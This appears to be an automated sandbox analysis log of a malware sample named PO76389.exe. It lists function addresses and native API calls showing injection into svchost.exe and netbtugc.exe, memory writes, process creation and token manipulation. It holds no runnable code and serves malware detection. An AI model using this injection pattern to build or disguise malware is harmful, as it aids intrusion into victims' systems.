            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02FD2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD35C0 NtCreateMutant,LdrInitializeThunk,5_2_02FD35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD39B0 NtGetContextThread,LdrInitializeThunk,5_2_02FD39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2AB0 NtWaitForSingleObject,5_2_02FD2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2B80 NtQueryInformationFile,5_2_02FD2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2EA0 NtAdjustPrivilegesToken,5_2_02FD2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2E30 NtWriteVirtualMemory,5_2_02FD2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2FA0 NtQuerySection,5_2_02FD2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2F90 NtProtectVirtualMemory,5_2_02FD2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2F60 NtCreateProcessEx,5_2_02FD2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2CF0 NtOpenProcess,5_2_02FD2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2CC0 NtQueryVirtualMemory,5_2_02FD2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2C00 NtQueryInformationProcess,5_2_02FD2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2DB0 NtEnumerateKey,5_2_02FD2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD2D00 NtSetInformationFile,5_2_02FD2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD3090 NtSetValueKey,5_2_02FD3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD3010 NtOpenDirectoryObject,5_2_02FD3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD3D70 NtOpenThread,5_2_02FD3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD3D10 NtOpenProcessToken,5_2_02FD3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00628B30 NtCreateFile,5_2_00628B30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00628CA0 NtReadFile,5_2_00628CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00628D90 NtDeleteFile,5_2_00628D90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00628E40 NtClose,5_2_00628E40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00628FB0 NtAllocateVirtualMemory,5_2_00628FB0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F702F: CreateFileW,DeviceIoControl,CloseHandle,0_2_004F702F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004EB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746C5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_004EB9F1
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004F82D0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004DBDF60_2_004DBDF6
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004BA0C00_2_004BA0C0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D01830_2_004D0183
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F220C0_2_004F220C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B85300_2_004B8530
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D06770_2_004D0677
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B66700_2_004B6670
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E87790_2_004E8779
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051A8DC0_2_0051A8DC
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D0A8F0_2_004D0A8F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B6BBC0_2_004B6BBC
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004DAC830_2_004DAC83
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B8CA00_2_004B8CA0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CAD5C0_2_004CAD5C
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D0EC40_2_004D0EC4
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E4EBF0_2_004E4EBF
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005130AD0_2_005130AD
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E113E0_2_004E113E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D12F90_2_004D12F9
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E542F0_2_004E542F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0051F5D00_2_0051F5D0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004C36800_2_004C3680
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E599F0_2_004E599F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004DDA740_2_004DDA74
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004BDCD00_2_004BDCD0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B5D320_2_004B5D32
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004BBDF00_2_004BBDF0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D1E5A0_2_004D1E5A
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004DDF690_2_004DDF69
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004E7FFD0_2_004E7FFD
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FBFB80_2_004FBFB8
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00DA29F80_2_00DA29F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025385732_2_02538573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02522A302_2_02522A30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0254EAD32_2_0254EAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025300332_2_02530033
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025230972_2_02523097
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0252E0B32_2_0252E0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025230A02_2_025230A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0252FE132_2_0252FE13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025226A02_2_025226A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025367532_2_02536753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0253674E2_2_0253674E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025234302_2_02523430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025224D02_2_025224D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F132D2_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA3522_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312D34C2_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0318739A2_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032003E62_2_032003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F02_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E02742_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031452A02_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B2C02_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C02C02_2_031C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E12ED2_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA1182_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031301002_2_03130100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C81582_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320B16B2_2_0320B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312F1722_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317516C2_2_0317516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032001AA2_2_032001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314B1B02_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F81CC2_2_031F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EF0CC2_2_031EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031470C02_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F70E92_2_031F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF0E02_2_031FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031647502_2_03164750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031407702_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF7B02_2_031FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C02_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F16CC2_2_031F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C6E02_2_0315C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031405352_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F75712_2_031F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DD5B02_2_031DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032005912_2_03200591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FF43F2_2_031FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F24462_2_031F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031314602_2_03131460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EE4F62_2_031EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FAB402_2_031FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFB762_2_031FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315FB802_2_0315FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F6BD72_2_031F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B5BF02_2_031B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317DBF92_2_0317DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFA492_2_031FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F7A462_2_031F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B3A6C2_2_031B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA802_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DDAAC2_2_031DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03185AA02_2_03185AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EDAC62_2_031EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031499502_2_03149950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315B9502_2_0315B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031569622_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320A9A62_2_0320A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A02_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD8002_2_031AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031428402_2_03142840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314A8402_2_0314A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031268B82_2_031268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E8F02_2_0316E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031438E02_2_031438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFF092_2_031FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160F302_2_03160F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03182F282_2_03182F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4F402_2_031B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03141F922_2_03141F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFFB12_2_031FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BEFA02_2_031BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132FC82_2_03132FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314CFE02_2_0314CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FEE262_2_031FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140E592_2_03140E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03152E902_2_03152E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FCE932_2_031FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03149EB02_2_03149EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FEEDB2_2_031FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314AD002_2_0314AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F1D5A2_2_031F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03143D402_2_03143D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F7D732_2_031F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03158DBF2_2_03158DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315FDC02_2_0315FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313ADE02_2_0313ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140C002_2_03140C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B9C322_2_031B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0CB52_2_031E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130CF22_2_03130CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FFCF22_2_031FFCF2
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027BD2C14_2_027BD2C1
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027BD2C64_2_027BD2C6
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027B6BA64_2_027B6BA6
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027B69864_2_027B6986
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027D56464_2_027D5646
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027B4C264_2_027B4C26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305A3525_2_0305A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030603E65_2_030603E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FAE3F05_2_02FAE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030402745_2_03040274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030202C05_2_030202C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0303A1185_2_0303A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030281585_2_03028158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030601AA5_2_030601AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030581CC5_2_030581CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030320005_2_03032000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F901005_2_02F90100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FBC6E05_2_02FBC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F9C7C05_2_02F9C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA07705_2_02FA0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FC47505_2_02FC4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030605915_2_03060591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030444205_2_03044420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030524465_2_03052446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA05355_2_02FA0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0304E4F65_2_0304E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305AB405_2_0305AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F9EA805_2_02F9EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03056BD75_2_03056BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FCE8F05_2_02FCE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F868B85_2_02F868B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0306A9A65_2_0306A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA28405_2_02FA2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FAA8405_2_02FAA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA29A05_2_02FA29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FB69625_2_02FB6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03042F305_2_03042F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03014F405_2_03014F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FB2E905_2_02FB2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0301EFA05_2_0301EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA0E595_2_02FA0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FACFE05_2_02FACFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305EE265_2_0305EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F92FC85_2_02F92FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305CE935_2_0305CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FC0F305_2_02FC0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FE2F285_2_02FE2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305EEDB5_2_0305EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F90CF25_2_02F90CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0303CD1F5_2_0303CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA0C005_2_02FA0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F9ADE05_2_02F9ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FB8DBF5_2_02FB8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03040CB55_2_03040CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FAAD005_2_02FAAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305132D5_2_0305132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FBB2C05_2_02FBB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA52A05_2_02FA52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FE739A5_2_02FE739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F8D34C5_2_02F8D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030412ED5_2_030412ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA70C05_2_02FA70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0306B16B5_2_0306B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FAB1B05_2_02FAB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F8F1725_2_02F8F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FD516C5_2_02FD516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0304F0CC5_2_0304F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305F0E05_2_0305F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030570E95_2_030570E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305F7B05_2_0305F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030516CC5_2_030516CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030575715_2_03057571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F914605_2_02F91460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0303D5B05_2_0303D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305F43F5_2_0305F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FE5AA05_2_02FE5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305FB765_2_0305FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03015BF05_2_03015BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FDDBF95_2_02FDDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03057A465_2_03057A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305FA495_2_0305FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03013A6C5_2_03013A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FBFB805_2_02FBFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03041AA35_2_03041AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0303DAAC5_2_0303DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0304DAC65_2_0304DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030359105_2_03035910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA38E05_2_02FA38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300D8005_2_0300D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA99505_2_02FA9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FBB9505_2_02FBB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305FF095_2_0305FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA9EB05_2_02FA9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305FFB15_2_0305FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F63FD55_2_02F63FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F63FD25_2_02F63FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA1F925_2_02FA1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03051D5A5_2_03051D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03057D735_2_03057D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03019C325_2_03019C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FBFDC05_2_02FBFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02FA3D405_2_02FA3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0305FCF25_2_0305FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_006118105_2_00611810
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0060C7605_2_0060C760
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0060C9805_2_0060C980
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0060AA005_2_0060AA00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00614EC05_2_00614EC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_006130A05_2_006130A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0061309B5_2_0061309B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0062B4205_2_0062B420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CAE2E85_2_02CAE2E8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CAE7A85_2_02CAE7A8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CAE4035_2_02CAE403
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CAD8085_2_02CAD808
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 96 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02FD5130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0300EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02FE7E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02F8B970 appears 275 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0301F290 appears 105 times
            Source: C:\Users\user\Desktop\PO76389.exeCode function: String function: 004CF885 appears 68 times
            Source: C:\Users\user\Desktop\PO76389.exeCode function: String function: 004D7750 appears 42 times
            Source: PO76389.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: PO76389.exe, 00000000.00000003.2096156829.00000000041AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO76389.exe
